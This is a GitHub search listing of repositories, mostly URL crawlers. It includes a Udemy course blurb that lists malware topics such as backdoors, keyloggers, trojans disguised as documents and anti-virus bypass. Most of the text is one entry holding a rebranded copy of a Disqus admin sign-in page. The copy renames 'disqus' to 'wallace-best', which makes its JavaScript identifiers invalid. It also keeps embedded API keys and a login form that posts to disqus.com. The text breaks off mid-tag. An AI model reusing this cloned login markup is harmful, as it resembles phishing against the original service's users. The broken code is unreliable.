Found 1,381 repositories(showing 30)
Ciyfly
Argo is an automated general crawler for automatically obtaining website URLs . Argo 是一个自动化扫描器爬虫 用于自动化获取网站的URL 基于go-rod实现了静态和动态结合的方式来实现
kevincobain2000
Yes it works! God Speed. Email Extractor by Full Url Crawl. Extract emails and web urls from a website with full crawl or option limit, depth of urls to crawl using terminal.
bookworm52
Welcome to my comprehensive course on python programming and ethical hacking. The course assumes you have NO prior knowledge in any of these topics, and by the end of it you'll be at a high intermediate level being able to combine both of these skills to write python programs to hack into computer systems exactly the same way that black hat hackers do. That's not all, you'll also be able to use the programming skills you learn to write any program even if it has nothing to do with hacking. This course is highly practical but it won't neglect the theory, we'll start with basics of ethical hacking and python programming and installing the needed software. Then we'll dive and start programming straight away. You'll learn everything by example, by writing useful hacking programs, no boring dry programming lectures. The course is divided into a number of sections, each aims to achieve a specific goal, the goal is usually to hack into a certain system! We'll start by learning how this system work and its weaknesses, then you'll lean how to write a python program to exploit these weaknesses and hack the system. As we write the program I will teach you python programming from scratch covering one topic at a time. By the end of the course you're going to have a number of ethical hacking programs written by yourself (see below) from backdoors, keyloggers, credential harvesters, network hacking tools, website hacking tools and the list goes on. You'll also have a deep understanding on how computer systems work, how to model problems, design an algorithm to solve problems and implement the solution using python. As mentioned in this course you will learn both ethical hacking and programming at the same time, here are some of the topics that will be covered in the course: Programming topics: Writing programs for python 2 and 3. Using modules and libraries. Variables, types ...etc. Handling user input. Reading and writing files. Functions. Loops. Data structures. Regex. Desiccation making. Recursion. Threading. Object oriented programming. Packet manipulation using scapy. Netfilterqueue. Socket programming. String manipulation. Exceptions. Serialisation. Compiling programs to binary executables. Sending & receiving HTTP requests. Parsing HTML. + more! Hacking topics: Basics of network hacking / penetration testing. Changing MAC address & bypassing filtering. Network mapping. ARP Spoofing - redirect the flow of packets in a network. DNS Spoofing - redirect requests from one website to another. Spying on any client connected to the network - see usernames, passwords, visited urls ....etc. Inject code in pages loaded by any computer connected to the same network. Replace files on the fly as they get downloaded by any computer on the same network. Detect ARP spoofing attacks. Bypass HTTPS. Create malware for Windows, OS X and Linux. Create trojans for Windows, OS X and Linux. Hack Windows, OS X and Linux using custom backdoor. Bypass Anti-Virus programs. Use fake login prompt to steal credentials. Display fake updates. Use own keylogger to spy on everything typed on a Windows & Linux. Learn the basics of website hacking / penetration testing. Discover subdomains. Discover hidden files and directories in a website. Run wordlist attacks to guess login information. Discover and exploit XSS vulnerabilities. Discover weaknesses in websites using own vulnerability scanner. Programs you'll build in this course: You'll learn all the above by implementing the following hacking programs mac_changer - changes MAC Address to anything we want. network_scanner - scans network and discovers the IP and MAC address of all connected clients. arp_spoofer - runs an arp spoofing attack to redirect the flow of packets in the network allowing us to intercept data. packet_sniffer - filters intercepted data and shows usernames, passwords, visited links ....etc dns_spoofer - redirects DNS requests, eg: redirects requests to from one domain to another. file_interceptor - replaces intercepted files with any file we want. code_injector - injects code in intercepted HTML pages. arpspoof_detector - detects ARP spoofing attacks. execute_command payload - executes a system command on the computer it gets executed on. execute_and_report payload - executes a system command and reports result via email. download_and_execute payload - downloads a file and executes it on target system. download_execute_and_report payload - downloads a file, executes it, and reports result by email. reverse_backdoor - gives remote control over the system it gets executed on, allows us to Access file system. Execute system commands. Download & upload files keylogger - records key-strikes and sends them to us by email. crawler - discovers hidden paths on a target website. discover_subdomains - discovers subdomains on target website. spider - maps the whole target website and discovers all files, directories and links. guess_login - runs a wordlist attack to guess login information. vulnerability_scanner - scans a target website for weaknesses and produces a report with all findings. As you build the above you'll learn: Setting up a penetration testing lab to practice hacking safely. Installing Kali Linux and Windows as virtual machines inside ANY operating system. Linux Basics. Linux terminal basics. How networks work. How clients communicate in a network. Address Resolution Protocol - ARP. Network layers. Domain Name System - DNS. Hypertext Transfer Protocol - HTTP. HTTPS. How anti-virus programs work. Sockets. Connecting devices over TCP. Transferring data over TCP. How website work. GET & POST requests. And more! By the end of the course you're going to have programming skills to write any program even if it has nothing to do with hacking, but you'll learn programming by programming hacking tools! With this course you'll get 24/7 support, so if you have any questions you can post them in the Q&A section and we'll respond to you within 15 hours. Notes: This course is created for educational purposes only and all the attacks are launched in my own lab or against devices that I have permission to test. This course is totally a product of Zaid Sabih & zSecurity, no other organisation is associated with it or a certification exam. Although, you will receive a Course Completion Certification from Udemy, apart from that NO OTHER ORGANISATION IS INVOLVED. What you’ll learn 170+ videos on Python programming & ethical hacking Install hacking lab & needed software (on Windows, OS X and Linux) Learn 2 topics at the same time - Python programming & Ethical Hacking Start from 0 up to a high-intermediate level Write over 20 ethical hacking and security programs Learn by example, by writing exciting programs Model problems, design solutions & implement them using Python Write programs in Python 2 and 3 Write cross platform programs that work on Windows, OS X & Linux Have a deep understanding on how computer systems work Have a strong base & use the skills learned to write any program even if its not related to hacking Understand what is Hacking, what is Programming, and why are they related Design a testing lab to practice hacking & programming safely Interact & use Linux terminal Understand what MAC address is & how to change it Write a python program to change MAC address Use Python modules and libraries Understand Object Oriented Programming Write object oriented programs Model & design extendable programs Write a program to discover devices connected to the same network Read, analyse & manipulate network packets Understand & interact with different network layers such as ARP, DNS, HTTP ....etc Write a program to redirect the flow of packets in a network (arp spoofer) Write a packet sniffer to filter interesting data such as usernames and passwords Write a program to redirect DNS requests (DNS Spoofer) Intercept and modify network packets on the fly Write a program to replace downloads requested by any computer on the network Analyse & modify HTTP requests and responses Inject code in HTML pages loaded by any computer on the same network Downgrade HTTPS to HTTP Write a program to detect ARP Spoofing attacks Write payloads to download a file, execute command, download & execute, download execute & report .....etc Use sockets to send data over TCP Send data reliably over TCP Write client-server programs Write a backdoor that works on Windows, OS X and Linux Implement cool features in the backdoor such as file system access, upload and download files and persistence Write a remote keylogger that can register all keystrikes and send them by Email Interact with files using python (read, write & modify) Convert python programs to binary executables that work on Windows, OS X and Linux Convert malware to torjans that work and function like other file types like an image or a PDF Bypass Anti-Virus Programs Understand how websites work, the technologies used and how to test them for weaknesses Send requests towebsites and analyse responses Write a program that can discover hidden paths in a website Write a program that can map a website and discover all links, subdomains, files and directories Extract and submit forms from python Run dictionary attacks and guess login information on login pages Analyse HTML using Python Interact with websites using Python Write a program that can discover vulnerabilities in websites Are there any course requirements or prerequisites? Basic IT knowledge No Linux, programming or hacking knowledge required. Computer with a minimum of 4GB ram/memory Operating System: Windows / OS X / Linux Who this course is for: Anybody interested in learning Python programming Anybody interested in learning ethical hacking / penetration testing Instructor User photo Zaid Sabih Ethical Hacker, Computer Scientist & CEO of zSecurity My name is Zaid Al-Quraishi, I am an ethical hacker, a computer scientist, and the founder and CEO of zSecurity. I just love hacking and breaking the rules, but don’t get me wrong as I said I am an ethical hacker. I have tremendous experience in ethical hacking, I started making video tutorials back in 2009 in an ethical hacking community (iSecuri1ty), I also worked as a pentester for the same company. In 2013 I started teaching my first course live and online, this course received amazing feedback which motivated me to publish it on Udemy. This course became the most popular and the top paid course in Udemy for almost a year, this motivated me to make more courses, now I have a number of ethical hacking courses, each focusing on a specific field, dominating the ethical hacking topic on Udemy. Now I have more than 350,000 students on Udemy and other teaching platforms such as StackSocial, StackSkills and zSecurity. Instructor User photo z Security Leading provider of ethical hacking and cyber security training, zSecurity is a leading provider of ethical hacking and cyber security training, we teach hacking and security to help people become ethical hackers so they can test and secure systems from black-hat hackers. Becoming an ethical hacker is simple but not easy, there are many resources online but lots of them are wrong and outdated, not only that but it is hard to stay up to date even if you already have a background in cyber security. Our goal is to educate people and increase awareness by exposing methods used by real black-hat hackers and show how to secure systems from these hackers. Video course
JosephPai
A python crawler for 1024 jap video from a mystery website. (No url)
gurtejrehal
Falcon Search has been created to aid the National Crime Records Bureau keeping in mind the need for an efficient AI data crawler that collects classified data from the web based on given keywords. It is a SaaS web data integration (WDI) platform which converts unstructured web data into structured format by extracting, preparing and integrating web data in areas of crime for consumption in criminal investigation agencies. Falcon provides a visual environment for automating the workflow of extracting and transforming web data. After specifying the target website url, the web data extraction module provides a visual environment for designing automated workflows for harvesting data, going beyond HTML/XML parsing of static content to automate end user interactions yielding data that would otherwise not be immediately visible. Once extracted, the software provides full data preparation capabilities that are used for harmonizing and cleansing the web data. For consuming the results, Falcon provides several options. It has its own visualization and dashboarding module to help criminal investigators gain the insights that they need. It also provides APIs that offer full access to everything that can be done on our platform, allowing web data to be integrated directly. FALCON is capable of crawling ten million links and scrape one million links per month using Celery Worker. It moreover has the potential of outperforming this number if tested under standard cloud platforms.
rix4uni
uforall is a fast url crawler this tool crawl all URLs number of different sources, alienvault,WayBackMachine,urlscan,commoncrawl
us
Fast, lightweight Firecrawl alternative in Rust. Web scraper, crawler & search API with MCP server for AI agents. Drop-in Firecrawl-compatible API (/v1/scrape, /v1/crawl, /v1/search). 2.3x faster than Tavily, 1.5x faster than Firecrawl in 1K-URL benchmarks. 6 MB RAM, single binary. Self-host or use managed cloud.
a WWDC 2015 session video's download url crawler
luckybaobaobao
This web crawler is designed to fetch URLs based on their domain rather than their subdomain.
saucer-man
python写的全站url爬取脚本,爬取网站的全部url用于分析站点目录
r3dxpl0it
A Minimal Yet Powerful Crawler for Extracting all The Internal/External/Fuzz-able Links from a website
debugtalk
A web crawler based on requests-html, mainly targets for url validation test.
komodoooo
Scripts, POCs & bullshit
AndacGuven
This project is a production-oriented technical SEO auditing skill built to behave like a real technical SEO specialist, not a simple crawler. It discovers indexable and non-indexable URLs across a site.
cyclone-github
Spider - web crawler and local wordlist processor to generate frequency sorted wordlist / ngrams
Wallace-Best
<!DOCTYPE html>Wallace-Best <html lang="en-us"> <head> <link rel="node" href="//a.wallace-bestcdn.com/1391808583/img/favicon16-32.ico" type="image/vnd.microsoft.icon"> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <meta http-equiv="Content-Language" content="en-us"> <meta name="keywords" content="Wallace Best, wallace-best.com, comments, blog, blogs, discussion"> <meta name="description" content="Wallace Best's Network is a global comment system that improves discussion on websites and connects conversations across the web."> <meta name="world" value="notranslate" /> <title> WB Admin | Sign-in </title> <script type="text/javascript" charset="utf-8"> document.domain = 'wallace-best.com'; if (window.context === undefined) { var context = {}; } context.wallace-bestUrl = 'https://wallace-best.com'; context.wallace-bestDomain = 'wallace-best.com'; context.mediaUrl = '//a.wallace-bestcdn.com/1391808583/'; context.uploadsUrl = '//a.wallace.bestcdn.com/uploads'; context.sslUploadsUrl = '//a.wallace-bestcdn.com/uploads'; context.loginUrl = 'https://wallace-best.com/profile/login/'; context.signupUrl = 'https://wallace-best.com/profile/signup/'; context.apiUrl = '//wallace-best.com/api/3.0/'; context.apiPublicKey = 'Y1S1wGIzdc63qnZ5rhHfjqEABGA4ZTDncauWFFWWTUBqkmLjdxloTb7ilhGnZ7z1'; context.forum = null; context.adminUrl = 'https://wallace-best.com'; context.switches = { "explore_dashboard_2":false, "partitions:api:posts/countPendin":false, "use_rs_paginator_30m":false, "inline_defaults_css":false, "evm_publisher_reports":true, "postsort":false, "enable_entropy_filtering":false, "exp_newnav":true, "organic_discovery_experiments":false, "realtime_for_oldies":false, "firehose_push":true, "website_addons":true, "addons_ab_test":false, "firehose_gnip_http":true, "community_icon":true, "pub_reporting_v2":true, "pd_thumbnail_settings":true, "algorithm_experiments":false, "discovery_log_to_browser":false, "is_last_modified":true, "embed_category_display":false, "partitions:api:forums/listPosts":false, "shardpost":true, "limit_get_posts_days_30d":true, "next_realtime_anim_disabled":false, "juggler_thread_onReady":true, "firehose_realertime":false, "loginas":true, "juggler_enabled":true, "user_onboarding":true, "website_follow_redirect":true, "raven_js":true, "shardpost:index":true, "filter_ads_by_country":true, "new_sort_paginator":true, "threadident_reads":true, "new_media":true, "enable_link_affiliation":true, "show_unapproved":false, "onboarding_profile_editing":true, "partitions":true, "dotcom_marketing":true, "discovery_analytics":true, "exp_newnav_disable":true, "new_community_nav_embed":true, "discussions_tab":true, "embed_less_refactor":false, "use_rs_paginator_60m":true, "embed_labs":false, "auto_flat_sort":false, "disable_moderate_ascending":true, "disable_realtime":true, "partitions:api":true, "digest_thread_votes":true, "shardpost:paginator":false, "debug_js":false, "exp_mn2":false, "limit_get_posts_days_7d":true, "pinnedcomments":false, "use_queue_b":true, "new_embed_profile":true, "next_track_links":true, "postsort:paginator":true, "simple_signup":true, "static_styles":true, "stats":true, "discovery_next":true, "override_skip_syslog":false, "show_captcha_on_links":true, "exp_mn2_force":false, "next_dragdrop_nag":true, "firehose_gnip":true, "firehose_pubsub":true, "rt_go_backend":false, "dark_jester":true, "next_logging":false, "surveyNotice":false, "tipalti_payments":true, "default_trusted_domain":false, "disqus_trends":false, "log_large_querysets":false, "phoenix":false, "exp_autoonboard":true, "lazy_embed":false, "explore_dashboard":true, "partitions:api:posts/list":true, "support_contact_with_frames":true, "use_rs_paginator_5m":true, "limit_textdigger":true, "embed_redirect":false, "logging":false, "exp_mn2_disable":true, "aggressive_embed_cache":true, "dashboard_client":false, "safety_levels_enabled":true, "partitions:api:categories/listPo":false, "next_show_new_media":true, "next_realtime_cap":false, "next_discard_low_rep":true, "next_streaming_realtime":false, "partitions:api:threads/listPosts":false, "textdigger_crawler":true }; context.urlMap = { 'signup': 'https://wallace-best.com/admin/signup/', 'dashboard': 'http://wallace-best.com/dashboard/', 'admin': 'http://wallace-best.com/admin/', 'logout': '//wallace-best.com/logout/', 'home': 'https://wallace-best.com', 'for_websites': 'http://wallace-best.com/websites/', 'login': 'https://wallace-best.com/profile/login/' }; context.navMap = { 'signup': '', 'dashboard': '', 'admin': '', 'addons': '' }; </script> <script src="//a.wallace-bestcdn.com/1391808583/js/src/auth_context.js" type="text/javascript" charset="utf-8"></script> <link rel="stylesheet" href="//a.wallace-bestdn.com/1391808583/build/css/b31fb2fa3905.css" type="text/css" /> <script type="text/javascript" src="//a.wallace-bestcdn.com/1391808583/build/js/5ee01877d131.js"></script> <script> // // shared/foundation.js // // This file contains the absolute minimum code necessary in order // to create a new application in the WALLACE-BEST namespace. // // You should load this file *before* anything that modifies the WALLACE-BEST global. // /*jshint browser:true, undef:true, strict:true, expr:true, white:true */ /*global wallace-best:true */ var WALLACE-BEST = (function (window, undefined) { "use strict"; var wallace-best = window.wallace-best || {}; // Exception thrown from wallace-best.assert method on failure wallace-best.AssertionError = function (message) { this.message = message; }; wallace-best.AssertionError.prototype.toString = function () { return 'Assertion Error: ' + (this.message || '[no message]'); }; // Raises a wallace-best.AssertionError if value is falsy wallace-best.assert = function (value, message, soft) { if (value) return; if (soft) window.console && window.console.log("DISQUS assertion failed: " + message); else throw new wallace-best.AssertionError(message); }; // Functions to clean attached modules (used by define and cleanup) var cleanFuncs = []; // Attaches a new public interface (module) to the wallace-best namespace. // For example, if wallace-best object is { 'a': { 'b': {} } }: // // wallace-best.define('a.b.c', function () { return { 'd': 'hello' }; }); will transform it into // -> { 'a': { 'b': { 'c': { 'd' : hello' }}}} // // and wallace-best.define('a', function () { return { 'x': 'world' }; }); will transform it into // -> { 'a': { 'b': {}}, 'x': 'world' } // // Attach modules to wallace-best using only this function. wallace-best.define = function (name, fn) { /*jshint loopfunc:true */ if (typeof name === 'function') { fn = name; name = ''; } var parts = name.split('.'); var part = parts.shift(); var cur = wallace-best; var exports = (fn || function () { return {}; }).call({ overwrites: function (obj) { obj.__overwrites__ = true; return obj; } }, window); while (part) { cur = (cur[part] ? cur[part] : cur[part] = {}); part = parts.shift(); } for (var key in exports) { if (!exports.hasOwnProperty(key)) continue; /*jshint eqnull:true */ if (!exports.__overwrites__ && cur[key] !== null) { wallace-best.assert(!cur.hasOwnProperty(key), 'Unsafe attempt to redefine existing module: ' + key, true /* soft assertion */); } cur[key] = exports[key]; cleanFuncs.push(function (cur, key) { return function () { delete cur[key]; }; }(cur, key)); } return cur; }; // Alias for wallace-best.define for the sake of semantics. // You should use it when you need to get a reference to another // wallace-best module before that module is defined: // // var collections = wallace-best.use('lounge.collections'); // // wallace-best.use is a single argument function because we don't // want to encourage people to use it instead of wallace-best.define. wallace-best.use = function (name) { return wallace-best.define(name); }; wallace-best.cleanup = function () { for (var i = 0; i < cleanFuncs.length; i++) { cleanFuncs[i](); } }; return wallace-best; })(window); /*jshint expr:true, undef:true, strict:true, white:true, browser:true */ /*global wallace-best:false*/ // // shared/corefuncs.js // wallace-best.define(function (window, undefined) { "use strict"; var wallace-best = window.wallace-best; var document = window.document; var head = document.getElementsByTagName('head')[0] || document.body; var jobs = { running: false, timer: null, queue: [] }; var uid = 0; // Taken from _.uniqueId wallace-best.getUid = function (prefix) { var id = ++uid + ''; return prefix ? prefix + id : id; }; /* Defers func() execution until cond() is true */ wallace-best.defer = function (cond, func) { function beat() { /*jshint boss:true */ var queue = jobs.queue; if (queue.length === 0) { jobs.running = false; clearInterval(jobs.timer); } for (var i = 0, pair; pair = queue[i]; i++) { if (pair[0]()) { queue.splice(i--, 1); pair[1](); } } } jobs.queue.push([cond, func]); beat(); if (!jobs.running) { jobs.running = true; jobs.timer = setInterval(beat, 100); } }; wallace-best.isOwn = function (obj, key) { // The object.hasOwnProperty method fails when the // property under consideration is named 'hasOwnProperty'. return Object.prototype.hasOwnProperty.call(obj, key); }; wallace-best.isString = function (str) { return Object.prototype.toString.call(str) === "[object String]"; }; /* * Iterates over an object or a collection and calls a callback * function with each item as a parameter. */ wallace-best.each = function (collection, callback) { var length = collection.length, forEach = Array.prototype.forEach; if (!isNaN(length)) { // Treat collection as an array if (forEach) { forEach.call(collection, callback); } else { for (var i = 0; i < length; i++) { callback(collection[i], i, collection); } } } else { // Treat collection as an object for (var key in collection) { if (wallace-best.isOwn(collection, key)) { callback(collection[key], key, collection); } } } }; // Borrowed from underscore wallace-best.extend = function (obj) { wallace-best.each(Array.prototype.slice.call(arguments, 1), function (source) { for (var prop in source) { obj[prop] = source[prop]; } }); return obj; }; wallace-best.serializeArgs = function (params) { var pcs = []; wallace-best.each(params, function (val, key) { if (val !== undefined) { pcs.push(key + (val !== null ? '=' + encodeURIComponent(val) : '')); } }); return pcs.join('&'); }; wallace-best.serialize = function (url, params, nocache) { if (params) { url += (~url.indexOf('?') ? (url.charAt(url.length - 1) == '&' ? '': '&') : '?'); url += wallace-best.serializeArgs(params); } if (nocache) { var ncp = {}; ncp[(new Date()).getTime()] = null; return wallace-best.serialize(url, ncp); } var len = url.length; return (url.charAt(len - 1) == "&" ? url.slice(0, len - 1) : url); }; var TIMEOUT_DURATION = 2e4; // 20 seconds var addEvent, removeEvent; // select the correct event listener function. all of our supported // browsers will use one of these if ('addEventListener' in window) { addEvent = function (node, event, handler) { node.addEventListener(event, handler, false); }; removeEvent = function (node, event, handler) { node.removeEventListener(event, handler, false); }; } else { addEvent = function (node, event, handler) { node.attachEvent('on' + event, handler); }; removeEvent = function (node, event, handler) { node.detachEvent('on' + event, handler); }; } wallace-best.require = function (url, params, nocache, success, failure) { var script = document.createElement('script'); var evName = script.addEventListener ? 'load' : 'readystatechange'; var timeout = null; script.src = wallace-best.serialize(url, params, nocache); script.async = true; script.charset = 'UTF-8'; function handler(ev) { ev = ev || window.event; if (!ev.target) { ev.target = ev.srcElement; } if (ev.type != 'load' && !/^(complete|loaded)$/.test(ev.target.readyState)) { return; // Not ready yet } if (success) { success(); } if (timeout) { clearTimeout(timeout); } removeEvent(ev.target, evName, handler); } if (success || failure) { addEvent(script, evName, handler); } if (failure) { timeout = setTimeout(function () { failure(); }, TIMEOUT_DURATION); } head.appendChild(script); return wallace-best; }; wallace-best.requireStylesheet = function (url, params, nocache) { var link = document.createElement('link'); link.rel = 'stylesheet'; link.type = 'text/css'; link.href = wallace-best.serialize(url, params, nocache); head.appendChild(link); return wallace-best; }; wallace-best.requireSet = function (urls, nocache, callback) { var remaining = urls.length; wallace-best.each(urls, function (url) { wallace-best.require(url, {}, nocache, function () { if (--remaining === 0) { callback(); } }); }); }; wallace-best.injectCss = function (css) { var style = document.createElement('style'); style.setAttribute('type', 'text/css'); // Make inline CSS more readable by splitting each rule onto a separate line css = css.replace(/\}/g, "}\n"); if (window.location.href.match(/^https/)) css = css.replace(/http:\/\//g, 'https://'); if (style.styleSheet) { // Internet Explorer only style.styleSheet.cssText = css; } else { style.appendChild(document.createTextNode(css)); } head.appendChild(style); }; wallace-best.isString = function (val) { return Object.prototype.toString.call(val) === '[object String]'; }; }); /*jshint boss:true*/ /*global wallace-best */ wallace-best.define('Events', function (window, undefined) { "use strict"; // Returns a function that will be executed at most one time, no matter how // often you call it. Useful for lazy initialization. var once = function (func) { var ran = false, memo; return function () { if (ran) return memo; ran = true; memo = func.apply(this, arguments); func = null; return memo; }; }; var has = wallace-best.isOwn; var keys = Object.keys || function (obj) { if (obj !== Object(obj)) throw new TypeError('Invalid object'); var keys = []; for (var key in obj) if (has(obj, key)) keys[keys.length] = key; return keys; }; var slice = [].slice; // Backbone.Events // --------------- // A module that can be mixed in to *any object* in order to provide it with // custom events. You may bind with `on` or remove with `off` callback // functions to an event; `trigger`-ing an event fires all callbacks in // succession. // // var object = {}; // _.extend(object, Backbone.Events); // object.on('expand', function(){ alert('expanded'); }); // object.trigger('expand'); // var Events = { // Bind an event to a `callback` function. Passing `"all"` will bind // the callback to all events fired. on: function (name, callback, context) { if (!eventsApi(this, 'on', name, [callback, context]) || !callback) return this; this._events = this._events || {}; var events = this._events[name] || (this._events[name] = []); events.push({callback: callback, context: context, ctx: context || this}); return this; }, // Bind an event to only be triggered a single time. After the first time // the callback is invoked, it will be removed. once: function (name, callback, context) { if (!eventsApi(this, 'once', name, [callback, context]) || !callback) return this; var self = this; var onced = once(function () { self.off(name, onced); callback.apply(this, arguments); }); onced._callback = callback; return this.on(name, onced, context); }, // Remove one or many callbacks. If `context` is null, removes all // callbacks with that function. If `callback` is null, removes all // callbacks for the event. If `name` is null, removes all bound // callbacks for all events. off: function (name, callback, context) { var retain, ev, events, names, i, l, j, k; if (!this._events || !eventsApi(this, 'off', name, [callback, context])) return this; if (!name && !callback && !context) { this._events = {}; return this; } names = name ? [name] : keys(this._events); for (i = 0, l = names.length; i < l; i++) { name = names[i]; if (events = this._events[name]) { this._events[name] = retain = []; if (callback || context) { for (j = 0, k = events.length; j < k; j++) { ev = events[j]; if ((callback && callback !== ev.callback && callback !== ev.callback._callback) || (context && context !== ev.context)) { retain.push(ev); } } } if (!retain.length) delete this._events[name]; } } return this; }, // Trigger one or many events, firing all bound callbacks. Callbacks are // passed the same arguments as `trigger` is, apart from the event name // (unless you're listening on `"all"`, which will cause your callback to // receive the true name of the event as the first argument). trigger: function (name) { if (!this._events) return this; var args = slice.call(arguments, 1); if (!eventsApi(this, 'trigger', name, args)) return this; var events = this._events[name]; var allEvents = this._events.all; if (events) triggerEvents(events, args); if (allEvents) triggerEvents(allEvents, arguments); return this; }, // Tell this object to stop listening to either specific events ... or // to every object it's currently listening to. stopListening: function (obj, name, callback) { var listeners = this._listeners; if (!listeners) return this; var deleteListener = !name && !callback; if (typeof name === 'object') callback = this; if (obj) (listeners = {})[obj._listenerId] = obj; for (var id in listeners) { listeners[id].off(name, callback, this); if (deleteListener) delete this._listeners[id]; } return this; } }; // Regular expression used to split event strings. var eventSplitter = /\s+/; // Implement fancy features of the Events API such as multiple event // names `"change blur"` and jQuery-style event maps `{change: action}` // in terms of the existing API. var eventsApi = function (obj, action, name, rest) { if (!name) return true; // Handle event maps. if (typeof name === 'object') { for (var key in name) { obj[action].apply(obj, [key, name[key]].concat(rest)); } return false; } // Handle space separated event names. if (eventSplitter.test(name)) { var names = name.split(eventSplitter); for (var i = 0, l = names.length; i < l; i++) { obj[action].apply(obj, [names[i]].concat(rest)); } return false; } return true; }; // A difficult-to-believe, but optimized internal dispatch function for // triggering events. Tries to keep the usual cases speedy (most internal // Backbone events have 3 arguments). var triggerEvents = function (events, args) { var ev, i = -1, l = events.length, a1 = args[0], a2 = args[1], a3 = args[2]; switch (args.length) { case 0: while (++i < l) { (ev = events[i]).callback.call(ev.ctx); } return; case 1: while (++i < l) { (ev = events[i]).callback.call(ev.ctx, a1); } return; case 2: while (++i < l) { (ev = events[i]).callback.call(ev.ctx, a1, a2); } return; case 3: while (++i < l) { (ev = events[i]).callback.call(ev.ctx, a1, a2, a3); } return; default: while (++i < l) { (ev = events[i]).callback.apply(ev.ctx, args); } } }; var listenMethods = {listenTo: 'on', listenToOnce: 'once'}; // Inversion-of-control versions of `on` and `once`. Tell *this* object to // listen to an event in another object ... keeping track of what it's // listening to. wallace-best.each(listenMethods, function (implementation, method) { Events[method] = function (obj, name, callback) { var listeners = this._listeners || (this._listeners = {}); var id = obj._listenerId || (obj._listenerId = wallace-best.getUid('l')); listeners[id] = obj; if (typeof name === 'object') callback = this; obj[implementation](name, callback, this); return this; }; }); // Aliases for backwards compatibility. Events.bind = Events.on; Events.unbind = Events.off; return Events; }); // used for /follow/ /login/ /signup/ social oauth dialogs // faking the bus wallace-best.use('Bus'); _.extend(DISQUS.Bus, wallace-best.Events); </script> <script src="//a.disquscdn.com/1391808583/js/src/global.js" charset="utf-8"></script> <script src="//a.disquscdn.com/1391808583/js/src/ga_events.js" charset="utf-8"></script> <script src="//a.disquscdn.com/1391808583/js/src/messagesx.js"></script> <!-- start Mixpanel --><script type="text/javascript">(function(e,b){if(!b.__SV){var a,f,i,g;window.mixpanel=b;a=e.createElement("script");a.type="text/javascript";a.async=!0;a.src=("https:"===e.location.protocol?"https:":"http:")+'//cdn.mxpnl.com/libs/mixpanel-2.2.min.js';f=e.getElementsByTagName("script")[0];f.parentNode.insertBefore(a,f);b._i=[];b.init=function(a,e,d){function f(b,h){var a=h.split(".");2==a.length&&(b=b[a[0]],h=a[1]);b[h]=function(){b.push([h].concat(Array.prototype.slice.call(arguments,0)))}}var c=b;"undefined"!== typeof d?c=b[d]=[]:d="mixpanel";c.people=c.people||[];c.toString=function(b){var a="mixpanel";"mixpanel"!==d&&(a+="."+d);b||(a+=" (stub)");return a};c.people.toString=function(){return c.toString(1)+".people (stub)"};i="disable track track_pageview track_links track_forms register register_once alias unregister identify name_tag set_config people.set people.set_once people.increment people.append people.track_charge people.clear_charges people.delete_user".split(" ");for(g=0;g<i.length;g++)f(c,i[g]); b._i.push([a,e,d])};b.__SV=1.2}})(document,window.mixpanel||[]); mixpanel.init('17b27902cd9da8972af8a3c43850fa5f', { track_pageview: false, debug: false }); </script><!-- end Mixpanel --> <script src="//a.disquscdn.com/1391808583//js/src/funnelcake.js"></script> <script type="text/javascript"> if (window.AB_TESTS === undefined) { var AB_TESTS = {}; } $(function() { if (context.auth.username !== undefined) { disqus.messagesx.init(context.auth.username); } }); </script> <script type="text/javascript" charset="utf-8"> // Global tests $(document).ready(function() { $('a[rel*=facebox]').facebox(); }); </script> <script type="text/x-underscore-template" data-template-name="global-nav"> <% var has_custom_avatar = data.avatar_url && data.avatar_url.indexOf('noavatar') < 0; %> <% var has_custom_username = data.username && data.username.indexOf('disqus_') < 0; %> <% if (data.username) { %> <li class="<%= data.forWebsitesClasses || '' %>" data-analytics="header for websites"><a href="<%= data.urlMap.for_websites %>">For Websites</a></li> <li data-analytics="header dashboard"><a href="<%= data.urlMap.dashboard %>">Dashboard</a></li> <% if (data.has_forums) { %> <li class="admin<% if (has_custom_avatar || !has_custom_username) { %> avatar-menu-admin<% } %>" data-analytics="header admin"><a href="<%= data.urlMap.admin %>">Admin</a></li> <% } %> <li class="user-dropdown dropdown-toggle<% if (has_custom_avatar || !has_custom_username) { %> avatar-menu<% } else { %> username-menu<% } %>" data-analytics="header username dropdown" data-floater-marker="<% if (has_custom_avatar || !has_custom_username) { %>square<% } %>"> <a href="<%= data.urlMap.home %>/<%= data.username %>/"> <% if (has_custom_avatar) { %> <img src="<%= data.avatar_url %>" class="avatar"> <% } else if (has_custom_username) { %> <%= data.username %> <% } else { %> <img src="<%= data.avatar_url %>" class="avatar"> <% } %> <span class="caret"></span> </a> <ul class="clearfix dropdown"> <li data-analytics="header view profile"><a href="<%= data.urlMap.home %>/<%= data.username %>/">View Profile</a></li> <li class="edit-profile js-edit-profile" data-analytics="header edit profile"><a href="<%= data.urlMap.dashboard %>#account">Edit Profile</a></li> <li class="logout" data-analytics="header logout"><a href="<%= data.urlMap.logout %>">Logout</a></li> </ul> </li> <% } else { %> <li class="<%= data.forWebsitesClasses || '' %>" data-analytics="header for websites"><a href="<%= data.urlMap.for_websites %>">For Websites</a></li> <li class="link-login" data-analytics="header login"><a href="<%= data.urlMap.login %>?next=<%= encodeURIComponent(document.location.href) %>">Log in</a></li> <% } %> </script> <!--[if lte IE 7]> <script src="//a.wallace-bestdn.com/1391808583/js/src/border_box_model.js"></script> <![endif]--> <!--[if lte IE 8]> <script src="//cdnjs.cloudflare.com/ajax/libs/modernizr/2.5.3/modernizr.min.js"></script> <script src="//a.wallace-bestcdn.com/1391808583/js/src/selectivizr.js"></script> <![endif]--> <meta name="viewport" content="width=device-width, user-scalable=no"> <meta name="apple-mobile-web-app-capable" content="yes"> <script type="text/javascript" charset="utf-8"> // Network tests $(document).ready(function() { $('a[rel*=facebox]').facebox(); }); </script> </head> <body class=""> <header class="global-header"> <div> <nav class="global-nav"> <a href="/" class="logo" data-analytics="site logo"><img src="//a.wallace-bestcdn.com/1391808583/img/disqus-logo-alt-hidpi.png" width="150" alt="wallace-best" title="wallace-best - Discover your community"/></a> </nav> </div> </header> <section class="login"> <form id="login-form" action="https://disqus.com/profile/login/?next=http://wallace-best.wallace-best.com/admin/moderate/" method="post" accept-charset="utf-8"> <h1>Sign in to continue</h1> <input type="text" name="username" tabindex="20" placeholder="Email or Username" value=""/> <div class="password-container"> <input type="password" name="password" tabindex="21" placeholder="Password" /> <span>(<a href="https://wallace-best.com/forgot/">forgot?</a>)</span> </div> <button type="submit" class="button submit" data-analytics="sign-in">Log in to wallace-best</button> <span class="create-account"> <a 